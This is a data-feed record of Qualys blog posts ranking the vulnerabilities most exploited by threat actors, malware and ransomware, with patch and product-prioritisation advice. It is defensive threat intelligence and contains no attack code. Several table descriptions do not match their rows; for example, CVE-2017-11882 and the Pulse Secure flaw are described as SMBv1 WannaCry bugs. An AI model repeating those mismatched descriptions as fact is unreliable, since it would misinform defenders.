the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Patch_Management_Patches_tab.png)Viewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-08T15:22:18", "description": "The [previous blog](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>) from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) often fall short in identifying high-risk vulnerabilities. \n\nIn this blog, we will focus on an **insider's perspective on the threat landscape**, viewing it through the eyes of an attacker. We will examine how quickly vulnerabilities get exploited in the wild, identify popularly sought-after vulnerabilities by threat actors, malware, and ransomware groups, and explore their underlying motives. \n\nWe will also provide insights on what measures to take you can take to safeguard your organizations from these vulnerabilities. \n\nSo, let's dive headfirst into this intriguing world without further ado. \n\n### How Fast Are Vulnerabilities Getting Exploited (Time to CISA KEV)?\n\nWe've already highlighted one of the most noteworthy efforts by the team at CISA - the creation of the known exploited vulnerabilities catalog in our previous blog. Initiated as part of [Binding Operational Directive 22-01 in 2021](<https://www.cisa.gov/news-events/directives/binding-operational-directive-22-01>), this project was born out of the need to minimize risks associated with these vulnerabilities. In its early years, there was a substantial backlog to address. Still, by 2023, the CISA team has had their operation running like a well-oiled machine and is swiftly updating the catalog with newly exploited vulnerabilities as soon as evidence emerges. \n\nSo, let's dive deep into understanding how quickly the vulnerabilities get exploited in the wild, as disclosed by the National Vulnerability Database(NVD).\n\nThe following graph illustrates the average duration it takes to include a vulnerability in the Known Exploited Vulnerabilities (KEV) catalog from when it was published in NVD.\n\nFor those CVEs disclosed in 2023, the gap to **time to KEV was just eight days**.\n\n![Average Time to CISA KEV in days](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-1-Average-Time-to-CISA-KEV-in-days-300x782.png)Fig 1. Average Time in Days to CISA KEV Catalog\n\nDefenders, therefore, have limited time to respond to vulnerabilities. The only viable response is through automation to patch these vulnerabilities before attackers can exploit them. Note that the average timeframe mentioned here, as in some instances, vulnerabilities are exploited almost instantly.\n\n### Which Vulnerabilities Are Exploited and by Whom?\n\nSo which vulnerabilities are exploited in the wild? And who is exploiting them? Are there any specific vulnerabilities that are more sought-after than others? If so, which ones?\n\nTo understand these questions, let's examine three main groups of attackers.\n\n * Threat Actor groups\n * Malwares\n * Ransomware groups\n\nAlthough there is some overlap within each group, it appears to favor a slightly different set of vulnerabilities depending on the use case.\n\n## Top Ten Vulnerabilities Exploited by Threat Actors\n\nHere\u2019s a list of the top ten vulnerabilities exploited by threat actors.\n\nThe chart below shows **the number of threat actors known to exploit a given vulnerability**.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-2-Top-10-Vulnerabilities-Exploited-by-Threat-Actors-1070x282.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-2-Top-10-Vulnerabilities-Exploited-by-Threat-Actors.png>)Fig 2. Top Ten Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n**Title** | **CVE**s | **Threat Actor Count** | **TruRisk Score** **(QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 53 | 100 | Allows a malicious actor to download Visual Basic script containing PowerShell commands. Works reliably well across a wide attack surface. Popular with [APT Groups](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>). \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 52 | 100 | Exploits Office's default Equation Editor feature by tricking the user to open a malicious file. This one is the hacking group\u2019s most favorite vulnerability, especially groups such as Cobalt or other malware as you will see in the next section. \nWindows Common Controls Remote Code Execution Vulnerability | CVE-2012-0158 | 45 | 100 | Executes remote code by tricking the user to click on a malicious link or specially crafted malicious file. \nApache Log4j RCE (Log4Shell) | CVE-2021-44228 | 26 | 100 | [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>). Do we need to say anything more? \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 24 | 100 | Executes remote code by tricking the user to open a specially crafted malicious file in Office or WordPad. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 22 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server in its default configuration. Heavily exploited by the [Hafnium](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 20 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be clubbed with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \nArbitrary file write vulnerability in Exchange | CVE-2021-27065 | 19 | 95 | Requires authentication that can then write arbitrary file write vulnerability in Exchange. Leveraged as part of the attack chain once an attacker has initial access. Exploited by Hafnium group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 17 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be chained with other CVE\u2019s CVE-2021-34473 and CVE-2021-31207 making it more attractive to cybercriminals. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-31207 | 17 | 95 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be chained with other CVE\u2019s CVE-2021-34473 and CVE-2021-31207 making it more attractive to cybercriminals. \n \nTable 1. Top 10 Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n## Top Ten Highly Active Threat Actors\n\nNext, let\u2019s talk about some of the most active threat actors known to leverage the maximum number of vulnerabilities as part of their arsenal capable of compromising systems across the globe.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-3-Most-Active-Threat-Actors-1070x275.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-3-Most-Active-Threat-Actors.png>)Fig 3. Most Active Threat Actors for High-Risk Vulnerabilities\n\n**Threat Actor ** | **CVEs Exploited ** | **Description ** \n---|---|--- \nEquation Group** ** | 51 | Uses a variety of malware, including backdoors, trojans, and rootkits, often targeting zero-day vulnerabilities. Such kinds of malware are often challenging to detect and remove. \nFancy Bear** ** | 44 | Best known as APT28 or Sofacy, it uses advanced malware and spear-phishing tactics. The group is also known for using \u201cwatering hole\u201d attacks. In 2016, APT28 reportedly attempted to interfere with the U.S. presidential elections. \nWicked Panda** ** | 30 | Also known by Axiom, Winnti, APT41, or Bronze Atlas. This group conducts financially motivated operations. It's been observed to target healthcare, telecom, technology, and video game industries in 14 countries. \nRicochet Chollima** ** | 26 | Also known as APT37, Reaper, and ScarCruft, they primarily target financial institutions, academics, and journalists. \nLabyrinth Chollima** ** | 24 | This is a sub-group of the Lazarus Group that has been attributed to the Reconnaissance General Bureau. It was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a known campaign called The Operation Blockbuster campaign by Novetta. \nStardust Chollima** ** | 22 | Also known as BlueNoroff, it is a sub-group of the Lazarus Group and has been attributed to the Reconnaissance General Bureau, target banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. \nCarbon Spider** ** | 22 | Also known as Carbanak, FIN7, and Anunak, this threat actor is a financially motivated threat group that targets the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. \nCozy Bear** ** | 20 | Also known as APT29, often targets government networks in Europe and NATO member countries, research institutes, and think tanks. \nAPT37** ** | 20 | It is also linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are You Happy? FreeMilk, North Korean Human Rights, and Evil New Year 2018. \n | | \n \nTable 2. Most Active Threat Actors for High-Risk Vulnerabilities \n\n## Top Ten Most Exploited Vulnerabilities by Malware\n\nNow, let\u2019s check some of the commonly exploited vulnerabilities by malware.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-4-Top-10-Vulnerabilities-Exploited-by-Malwares-1070x302.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-4-Top-10-Vulnerabilities-Exploited-by-Malwares.png>)Fig 4. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\nTitle | CVEs | Malware Count | TruRisk Score (QVS) | Description \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 467 | 100 | The absolute granddaddy of all CVEs most exploited by malware. \nIn the history of CVEs, this would be the most beloved malware CVE of all time. \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 92 | 100 | [Allows a malicious actor to download Visual Basic script containing PowerShell commands. Works reliably well across a wide attack surface. Popular with APT Groups.](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 91 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nMicrosoft Office Remote Code Execution Vulnerability | CVE-2017-8570 | 52 | 100 | [Executes remote code by tricking the user to open a malicious RTF file. Bypasses the patch from CVE-2017-0199. Known to be used in malware spam campaigns.](<https://www.zscaler.com/blogs/security-research/cve-2017-8570-and-cve-2018-0802-exploits-being-used-spread-lokibot>) \nWindows Graphics Device Interface (GDI) RCE | CVE-2019-0903 | 30 | 93 | Exploits vulnerability in the Graphics Component which is fundamental part of the Windows OS used for rendering graphics. \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 29 | 100 | Exploits a vulnerability that was not patched by CVE-2017-11882. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 19 | 100 | [Allows an unauthenticated user to run arbitrary commands on the exchange server in its default configuration. Heavily exploited by Hafnium group among others.](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 17 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. \nLets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows CryptoAPI Spoofing Vulnerability | CVE-2020-0601 | 17 | 95 | Enables attackers to execute spoofing attacks, masquerading malicious programs as legitimate software, apparently authenticated with a genuine digital signature. \nThis essentially allows for the delivery of malware under the guise of legitimate software. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. \nIt can be chained with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \n \nTable 3. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\n## Top Ten Most Active Malware\n\nAnd here\u2019s a list of the ten most common malware names that are known to exploit vulnerabilities that compromise systems.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-5-Most-Active-Malwares-1070x294.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-5-Most-Active-Malwares.png>)Fig 5. Most Active Malware for High-Risk Vulnerabilities\n\nMalware | CVEs Count | Description \n---|---|--- \nHeuristic | 117 | Heuristic viruses can refer to malware detected by heuristic analysis or the virus Heur. The Invader, which compromises a device\u2019s security and antivirus measures. Some examples of heuristic viruses include adware and Trojans. \nWacatac | 94 | Also known as Trojan: Win32/Wacatac.B, is a trojan horse that is designed to steal personal information, such as passwords, credit card numbers, and other sensitive data. \nPidief | 73 | Pidief malware is a file infector, that can infect executable files, such as .exe files, it will modify the file to execute the Pidief malware. \nSkeeyah | 52 | Skeeyah malware is a file infector that can infect executable files, such as .exe files. It will modify the file in a way that will execute the Skeeyah malware when the file is opened. \nBitrep | 49 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent and may cause performance degradation, and security malfunctions leading to unauthorized users gaining remote access \nMeterpreter | 46 | Meterpreter is a malicious trojan-type program that allows cyber criminals to remotely control infected computers, without writing anything to disk. This malware can log keystrokes - recording keyboard input (keys pressed) to steal credentials (logins, passwords) linked with various accounts and personal information. \nSwifi | 42 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent, and may cause performance degradation, and security malfunctions leading to unauthorized users gaining remote access \nIFrame | 38 | The iframes are used to inject malicious content into a website and can be spread through malicious websites that contain iframes with malicious content. \nLotoor | 35 | It can infect Android devices, often spread through malicious apps available on third-party app stores. These apps may appear to be legitimate, but they actually contain the Lotoor malware. \nRedirector | 34 | Redirects users to malicious websites without their knowledge or consent. This type of malware can be very dangerous, leading users to download other malicious software or enter personal information. \n \nTable 4. Most Active Malware for High-Risk Vulnerabilities\n\n## Top Ten Vulnerabilities Exploited by Ransomware\n\nLastly, let's examine the vulnerabilities that ransomware tends to exploit. **Ransomware is a particular type of malware that encrypts data on storage systems, rendering them inaccessible unless the victim pays a ransom, typically in Bitcoin.** Since the notorious WannaCry crypto-ransomware incident in May 2017, the use of such malicious software has notably escalated.\n\nThe latest report on such escalating threat involves a data breach during a MOVEit transfer, for which the BlackCat ransomware gang claimed responsibility. This same group alleges to be behind the data theft attack on Reddit.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-6-Top-10-Vulnerabilities-Exploited-by-Ransomware-1070x274.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-6-Top-10-Vulnerabilities-Exploited-by-Ransomware.png>)Fig 6. Top Ten Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n**Title** | **CVEs** | **Ransomware Count** | **TruRisk** **Score (QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 14 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 to completely compromise systems. It was used by the [WannaCry crypto worm](<https://en.wikipedia.org/wiki/WannaCry_ransomware_attack>) as part of a worldwide cyberattack. \nJava AtomicReferenceArray deserialization RCE | CVE-2012-0507 | 42 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system by tricking the user to visit a malicious link. Old CVE, but still relevant. \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 13 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0145 | 13 | 100 | Allows an unauthenticated, remote attacker to read arbitrary files allowing the attacker to access private keys or user/password information, which is then used to gain further unauthorized access. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. It Can be chained with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \nPulse Connect Secure SSL VPN Vulnerability | CVE-2019-11510 | 12 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 that completely compromises systems. It was leveraged by the WannaCry crypto worm as part of a worldwide cyberattack. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0144 | 12 | 95 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 11 | 93 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 10 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. \nIt lets the attacker instantly become an admin on enterprise networks. \nCitrix Application Delivery Controller/NetScaler RCE | CVE-2019-19781 | 10 | 100 | Allows an unauthenticated attacker to execute arbitrary code on the system. Was leveraged to drop NOTROBIN malware to maintain persistent access. \n \nTable 5. Top 10 Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-7-Most-Active-Ransomwares-1070x312.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-7-Most-Active-Ransomwares.png>)Fig 7. Most Active Ransomware for High-Risk Vulnerabilities\n\n**Ransomware** | **CVEs** **Count** | **Description** \n---|---|--- \n**Conti** | 30 | "Conti" is a Ransomware-as-a-Service (RaaS) targeting corporations and agencies by stealing and threatening to publish their sensitive data unless a ransom is paid. It uses unique encryption keys for each file and victim and leverages the Windows Restart Manager to unlock files for encryption. \n**Cerber** | 30 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**REvil** | 25 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**Sodinokibi** | 21 | A successor to REvil that is even more sophisticated. It can encrypt files on all types of devices, including servers, laptops, and mobile phones. \n**Lucky** | 21 | This ransomware is known for its aggressive spam campaigns. It sends emails with malicious attachments that, when opened, infect the victim's computer with ransomware. \n**GandCrab** | 19 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. \n**Ryuk** | 17 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. \n**Reveton** | 16 | Known for its scareware tactics, this ransomware displays a fake warning message claiming the victim's computer has been infected with malware. The message demands that the victim pay a ransom to remove the malware. \n**STOP** | 15 | Ransomware operators are known to be aggressive and persistent, often threatening to release stolen data or to attack systems again if the ransom is not paid. \n**Satan** | 15 | Satan ransomware can be very high, and there is no guarantee that victims will get their data back even if they pay the ransom. Used in attacks against high-profile organizations, healthcare, education, government, and businesses of all sizes. \n \nTable 6. Most Active Ransomware for High-Risk Vulnerabilities\n\n## Prioritizing Exploited Vulnerabilities with The Qualys VMDR and TruRisk\n\nOftentimes, malicious actors frequently target diverse sets of vulnerabilities to accomplish their objectives. As such, keeping track of who is exploiting what can be daunting, and it's certainly not an efficient use of the time for practitioners or security & risk management leaders.\n\nHence, **The Qualys VMDR with TruRisk** facilitates this process, substantially simplifying the prioritization process by translating the risk associated with vulnerabilities, assets, and asset groups into an easily understandable score that both technical and non-technical teams can comprehend this scoring system.\n\nWhen you carefully observe, each vulnerability mentioned above has a TruRisk Score (QVS) of over 90. TruRisk considers these factors daily, consistently assigning a score higher than 90.\n\nSo, from a prioritization standpoint, any issue with a score of 90 or above should be immediately prioritized and remedied.\n\nLet\u2019s take CVE-2017-11882 as an example. The TruRisk score clearly indicates why this is a high-risk vulnerability, with more than 400 malware and 50 threat actors exploiting it, and **we see evidence of exploitation as recently as July 16th, 2023, for a 6-year-old vulnerability. **\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-8-Microsoft-Office-Memory-Corruption-Vulnerability_-CVE-2017-11882-1070x1255.jpg)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-8-Microsoft-Office-Memory-Corruption-Vulnerability_-CVE-2017-11882.jpg>)\n\nFig 8. Microsoft Office Memory Corruption Vulnerability: CVE-2017-11882\n\n## Assess Your Organizations Exposure to Risk / TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk vulnerabilities, especially those exploited in the wild.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-9-1-1070x737.jpg)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-9-1.jpg>)\n\nFig 9. Qualys VMDR TruRisk Dashboard for High-Risk Vulnerabilities\n\nThe fastest method to gain insights into your TruRisk is by downloading and importing the TruRisk Dashboard into your VMDR subscription.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/07/Qualys_VMDR_TruRisk__UDDashboard.zip>)\n\nAnd once you have the visibility patch with Qualys Patch management instantly reduce the risk.\n\n## Key Insights & Takeaways\n\n * The time to Known Exploited Vulnerability (KEV) is down to eight days for CVEs published in 2023. Defenders should leverage automation to patch high-risk vulnerabilities.\n * CVE-2017-11882 stands out as the pinnacle among CVEs in its exploitation by malware, threat actors, and ransomware groups. With over 400 malware, 50 threat actors, and 14 ransomware groups taking advantage of this vulnerability, it will likely be remembered as the most cherished attacker CVE ever.\n * Attackers prominently exploit vulnerabilities in popular applications such as Microsoft Office, Microsoft Exchange, Windows Operating systems, Java, Pulse Secure SSL VPN, and Citrix ADC/NetScaler. Attackers seek these applications** primarily due to their widespread usage and potential for exploiting security weaknesses.**\n * Organizations should leverage threat intelligence to prioritize vulnerabilities that reduce the risk of exploitation.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a **TruRisk score of 90 or higher,** greatly simplifying the prioritization process.\n\nConcluding this series in the next blog we will discuss the _**15 most exploited vulnerabilitie**_**_s ever_**.\n\nWatch out for our next blog.\n\n## References\n\n * <https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>\n * <https://blog.qualys.com/qualys-insights/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>\n * <https://blog.qualys.com/vulnerabilities-threat-research/2022/12/16/implement-risk-based-vulnerability-management-with-qualys-trurisk-part-2>\n * <https://blog.qualys.com/qualys-insights/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>\n\n## Additional Contributor\n\nShreya Salvi, Data Scientist, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-07-18T13:38:53", "type": "qualysblog", "title": "Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2019-0903", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0601", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "modified": "2023-07-18T13:38:53", "id": "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-22T16:37:11", "description": "The earlier blog posts showcased an overview of the **vulnerability threat landscape** that is either remotely exploited or most targeted by attackers._ _A quick recap \u2013 We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.\n\nThis blog post will focus on **Qualys\u2019 Top Twenty Vulnerabilities, **targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.\n\nSome of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>)**,** published on August 3, 2023; you can access it from [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>)**.**\n\nRead on- \n\n## Stats on the Top 20 Vulnerable Vendors & By-Products\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-1.-Top-20-Vulnerable-Vendor-1070x694.png)**Fig 1. Top Vulnerable Vendor**\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-2.-Top-20-Vulnerable-Products-1070x708.png)**Fig 2. Top Vulnerable Products**\n\n## Top Twenty Most Targeted by Attackers\n\n### **1. CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**\n\nIt was exploited by 467 Malware, 53 Threat Actors, and 14 Ransomware and was trending in the wild as recently as August 31, 2023. \n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\n**Qualys Vulnerability Detection (QID): 110308**\n\nDisclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office's Equation Editor. It could enable an attacker to execute arbitrary code under the current user's permissions. \n\nIf the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. This vulnerability will be exploited if the user opens a specially crafted file, potentially sent via email or hosted on a compromised website.\n\nIt\u2019s been primarily exploited in various cyber-attacks and espionage campaigns.\n\n### 2\\. **CVE-2017-0199: Microsoft Wordpad Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**\n\nIt was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 110297**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2017-0199 is a notable remote code execution vulnerability that affects specific Microsoft Office and WordPad versions precisely when they parse specially crafted files. This vulnerability is the most favored vulnerability by malware, threat actors, and ransomware. \n\nIf successfully exploited, an attacker could execute arbitrary code in the current user's security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft has addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows for further resolution.\n\n### 3\\. **CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**\n\n**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**\n\nIt was exploited by 63 Malware, 45 Threat Actors, 2 Ransomware and was trending in the wild as recently as August 31, 2023.\n\n**Qualys Vulnerability Detection (QID): 90793**\n\nCVE-2012-0158 is a substantial remote code execution vulnerability in Windows standard controls. An attacker can exploit the flaw by constructing a specially crafted webpage. Upon viewing this webpage, the vulnerability can allow remote code execution, potentially granting the attacker the same rights as the logged-on user. \n\nIf the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been notably exploited in various cyber-attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user 